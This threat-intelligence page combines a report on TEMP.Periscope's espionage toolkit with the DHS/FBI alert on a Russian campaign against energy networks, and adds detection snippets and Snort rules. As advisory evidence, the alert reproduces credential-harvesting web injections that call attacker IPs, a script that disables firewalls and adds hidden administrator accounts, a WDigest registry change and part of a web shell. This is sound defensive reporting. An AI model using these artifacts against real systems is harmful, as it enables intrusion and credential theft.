The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listings; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes; returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.
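
Several of these tools retrieve tasking from content hidden in ordinary webpages. As a purely hypothetical sketch (the marker, encoding, and page format below are invented for illustration and are not AIRBREAK's real scheme), a backdoor of this style might scrape base64-encoded commands out of HTML comments:

```python
import re

# Invented marker for illustration only; the real AIRBREAK string format
# is not documented in this post.
HIDDEN = re.compile(r"<!--\s*cfg:([A-Za-z0-9+/=]+)\s*-->")

def extract_hidden_commands(page_html: str) -> list:
    """Return the base64 payloads hidden in comments matching the marker."""
    return HIDDEN.findall(page_html)

page = '<html><body>news article</body><!-- cfg:ZGlyIEM6XA== --></html>'
# extract_hidden_commands(page) returns ['ZGlyIEM6XA==']
```

Hiding tasking inside legitimate-looking pages and profiles lets the implant's traffic blend in with normal browsing, which is one reason the group favors services such as GitHub and TechNet for C2.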

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft's TechNet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of likely compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as GitHub and Microsoft's TechNet portal.


The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.







[Figures omitted. Current-wave indicator tables cover HOMEFRY, a 64-bit Windows password dumper/cracker; MURKYTOP, a command-line reconnaissance tool; and AIRBREAK, a JavaScript-based backdoor that retrieves commands from hidden strings in compromised webpages.]

Historical Indicators

[Figures omitted. Historical indicator tables cover AIRBREAK; Beacon, a commercially available backdoor; PHOTO, also reported as Derusbi; and BADFLICK, a backdoor capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.]

TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Original release date: March 15, 2018 | Last revised: March 16, 2018

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers


This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.


Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate accounts),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.


Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.


Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
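
On the defensive side, this remote-template trick leaves a visible artifact: a file:// target inside the document's relationship parts. A minimal triage sketch (the regex and part selection are simplifications; a production tool would parse the relationship XML properly):

```python
import io
import re
import zipfile

# A .docx is a ZIP archive; external references (such as a remote template)
# live in *.rels relationship parts as Target="file://..." entries.
REMOTE_REF = re.compile(rb'Target="(file://[^"]+)"')

def find_remote_templates(docx_bytes: bytes) -> list:
    """Return file:// targets found in a .docx's relationship parts."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                hits.extend(REMOTE_REF.findall(z.read(name)))
    return hits
```

Any hit resembling `file://<remote IP>/Normal.dotm` warrants a closer look, since merely opening such a document can leak the user's credential hash over SMB.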


Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered the websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. They modified these websites by altering JavaScript and PHP files to request a file icon over SMB from an IP address controlled by the threat actors. This request accomplishes the same credential-harvesting technique observed in the spear-phishing documents. In one instance, the threat actors added a line of code to “header.php”, a legitimate PHP file, to carry out the redirection.


<img src="file[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />


In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:


var i = document.createElement("img");

i.src = "file[:]//184.154.150[.]66/ame_icon.png";

i.width = 3;
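
Site owners can hunt for this kind of injection by scanning page source for file:// references to bare IP addresses, which have no business in legitimate web content. A simple sketch (note that the IOCs above are defanged with [.]; this scanner expects refanged text):

```python
import re

# file:// plus a bare IPv4 address in page source is a strong hint of the
# SMB credential-harvesting injection described above.
INJECTED = re.compile(r'file://(\d{1,3}(?:\.\d{1,3}){3})/\S+')

def scan_web_source(text: str) -> list:
    """Return the IPs referenced via file:// in the given source text."""
    return INJECTED.findall(text)

snippet = 'i.src = "file://184.154.150.66/ame_icon.png";'
# scan_web_source(snippet) returns ['184.154.150.66']
```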



Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.


Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects: the http://bit[.]ly/2m0x8IH link redirected to http://tinyurl[.]com/h3sdqck, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliners[.]com website contained input fields for an email address and password, mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1]
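
Because the harvesting depends on SMB leaving the network, outbound TCP 445/139 to public addresses is a useful detection (and blocking) point. A sketch over hypothetical flow records of the form (src, dst, dport); the record layout is an assumption for illustration:

```python
import ipaddress

def suspicious_smb_egress(flows):
    """Flag SMB flows whose destination is outside private address space."""
    alerts = []
    for src, dst, dport in flows:
        if dport in (445, 139) and not ipaddress.ip_address(dst).is_private:
            alerts.append((src, dst, dport))
    return alerts

flows = [
    ("10.0.0.5", "10.0.0.9", 445),        # internal file sharing: expected
    ("10.0.0.5", "184.154.150.66", 445),  # SMB leaving the network: flag
]
# suspicious_smb_egress(flows) returns [('10.0.0.5', '184.154.150.66', 445)]
```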


Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.


Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.


Contents of symantec_help.jsp


<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>


The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English.


Contents of enu.cmd


netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /f

net user MS_BACKUP <Redacted_Password> /add

net localgroup Administrators /add MS_BACKUP

net localgroup Administradores /add MS_BACKUP

net localgroup Amministratori /add MS_BACKUP

net localgroup Administratoren /add MS_BACKUP

net localgroup Administrateurs /add MS_BACKUP

net localgroup "Remote Desktop Users" /add MS_BACKUP

net user MS_BACKUP /expires:never

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

sc config termservice start= auto

net start termservice
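
The script's actions translate directly into detection logic: process-creation logs can be screened for the firewall-disabling and RDP-exposing commands shown above. A sketch whose patterns cover only the commands seen in enu.cmd:

```python
import re

# Patterns derived from the enu.cmd contents above: disabling the host
# firewall, globally opening 3389, and enabling RDP connections.
SUSPECT = [
    re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I),
    re.compile(r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
    re.compile(r"GloballyOpenPorts\\List.*3389", re.I),
    re.compile(r"fDenyTSConnections.*/d\s+0", re.I),
]

def flag_commands(log_lines):
    """Return logged command lines matching any tampering pattern."""
    return [ln for ln in log_lines if any(p.search(ln) for p in SUSPECT)]
```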


DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:

Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.

Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.

Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).

Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks.


Scheduled Task

In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours.


VPN Software

After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks.


Password Cracking Tools

Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open-source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publicly available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\.



Once inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.

In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:

  • The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.
  • The files were renamed to new extensions, with INST.txt being renamed INST.exe.
  • The files were executed on the host and then immediately deleted.
  • The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.
  • The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key.


Persistence Through .LNK File Manipulation

The threat actors manipulated LNK files, commonly known as Microsoft Windows shortcut files, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in functionality by setting the icon path to a remote server controlled by the actors. When a user browses to the directory, Windows attempts to load the icon and initiates an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.

Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:


Parsed output for file: desktop.ini.lnk
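
Strings inside a .lnk file are stored as UTF-16LE, so even without a full shell-link parser, a crude triage pass can surface shortcuts whose icon path points at a remote host by IP, as in the files above. This heuristic trades precision for brevity (a proper implementation would walk the Shell Link binary format, and this naive decode can miss strings at odd byte offsets):

```python
import re

# Match a UNC path whose host is a bare IPv4 address, e.g. \\62.8.193.206\...
UNC_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")

def remote_icon_hosts(lnk_bytes: bytes) -> list:
    """Heuristic: decode .lnk bytes as UTF-16LE and pull out UNC IP hosts."""
    text = lnk_bytes.decode("utf-16-le", errors="ignore")
    return UNC_IP.findall(text)
```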

Registry Modification

The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command.


reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f


Stage 6: Command and Control

The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx”, “autodiscover.aspx”, and “index.aspx”) for two different web shells. The difference between the two groups was the “public string Password” field.


Beginning Contents of the Web Shell


<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>

<%@ import Namespace="System"%>

<%@ import Namespace="System.IO"%>

<%@ import Namespace="System.Diagnostics"%>

<%@ import Namespace="System.Data"%>

<%@ import Namespace="System.Management"%>

<%@ import Namespace="System.Data.OleDb"%>

<%@ import Namespace="Microsoft.Win32"%>

<%@ import Namespace="System.Net.Sockets" %>

<%@ import Namespace="System.Net" %>

<%@ import Namespace="System.Runtime.InteropServices"%>

<%@ import Namespace="System.DirectoryServices"%>

<%@ import Namespace="System.ServiceProcess"%>

<%@ import Namespace="System.Text.RegularExpressions"%>

<%@ Import Namespace="System.Threading"%>

<%@ Import Namespace="System.Data.SqlClient"%>

<%@ import Namespace="Microsoft.VisualBasic"%>

<%@ Import Namespace="System.IO.Compression" %>

<%@ Assembly Name="System.DirectoryServices,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.Management,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.ServiceProcess,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

<script runat = "server">

public string Password = "<REDACTED>";

public string z_progname = "z_WebShell";
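
The shell's structure suggests a simple file-level heuristic: legitimate ASPX pages rarely combine a server-side script block with a hard-coded password gate. A hedged sketch (the marker choice is an illustration, not a comprehensive signature):

```python
import re

# Both markers are drawn from the web shell excerpt above; requiring both
# keeps false positives down on ordinary server-side pages.
MARKERS = (
    re.compile(r'<script\s+runat\s*=\s*"?server"?', re.I),
    re.compile(r'public\s+string\s+Password\s*=', re.I),
)

def looks_like_webshell(aspx_source: str) -> bool:
    """Flag sources matching both web-shell markers."""
    return all(p.search(aspx_source) for p in MARKERS)
```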



Stage 7: Actions on Objectives

DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets.


Internal Reconnaissance

Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.

Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:

  • admins.txt
  • completed_dclist.txt
  • completed_trusts.txt
  • completed_zone.txt
  • comps.txt
  • conditional_forwarders.txt
  • domain_zone.txt
  • enum_zones.txt
  • users.txt

The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “” and “”.

The threat actors used Windows scheduled tasks and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actors used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.

In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.

  1. The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.
  2. The directory “out” is created in the user’s %AppData% folder.
  3. PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.
  4. The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.
  5. The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.
  6. In one instance, DHS observed an “” file created.

DHS observed the threat actors create and modify a text document labeled “ip.txt”, which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts for additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows command “query user” run across the network.


Using <Username> <Password>
Running -s cmd /c query user on <Hostname1>
Running -s cmd /c query user on <Hostname2>
Running -s cmd /c query user on <Hostname3>
<user1>                                              2       Disc       1+19:34         6/27/2017 12:35 PM
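
Recovered res.txt content like the sample above can be parsed back into structured records, since query user columns are separated by runs of spaces (disconnected sessions omit the SESSIONNAME column, as here):

```python
import re

def parse_query_user(line: str) -> dict:
    """Split one disconnected-session row of 'query user' output into fields."""
    user, session_id, state, idle, logon = re.split(r"\s{2,}", line.strip())
    return {"user": user, "id": session_id, "state": state,
            "idle": idle, "logon": logon}

row = "<user1>      2     Disc     1+19:34     6/27/2017 12:35 PM"
# parse_query_user(row)["state"] == "Disc"
```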


An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.

In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.

The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names were

  • Chromex64,
  • Microsoft_Corporation,
  • NT,
  • Office365,
  • Temp, and
  • Update.


Targeting of ICS and SCADA Infrastructure

In multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these file names contained ICS vendor names and references to ICS documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).

The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed.

This image depicts a reconstructed screenshot of a Human Machine Interface (HMI) system that was accessed by the threat actor. This image demonstrates the threat actor's focus and interest in Industrial Control System (ICS) environments.


Cleanup and Cover Tracks

In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network, along with any logs produced. For example, the FortiClient software installed at one commercial facility was deleted along with the logs produced from its use. Finally, data generated by other accounts used on the accessed systems was deleted.

The threat actors cleaned up their intended target networks by deleting the screenshots they had created and removing specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the registry key associated with the Terminal Server Client that tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as “scr.exe”.


Detection and Response

IOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors.
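One way to act on the file-hash portion of those IOC packages is to hash suspect files and compare the results against the provided list. A minimal Python sketch (the helper names are ours, and the watchlist contents would come from the alert's .csv file, not the placeholder shown here):

```python
import hashlib

def md5_of(path):
    """Compute the MD5 of a file in chunks (IOC lists in this alert use MD5)."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest().upper()

def match_iocs(paths, ioc_hashes):
    """Return the files whose MD5 appears in the IOC hash watchlist."""
    watchlist = {h.upper() for h in ioc_hashes}
    return [p for p in paths if md5_of(p) in watchlist]
```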


Network Signatures and Host-Based Rules

This section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains.


Network Signatures

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)


alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)


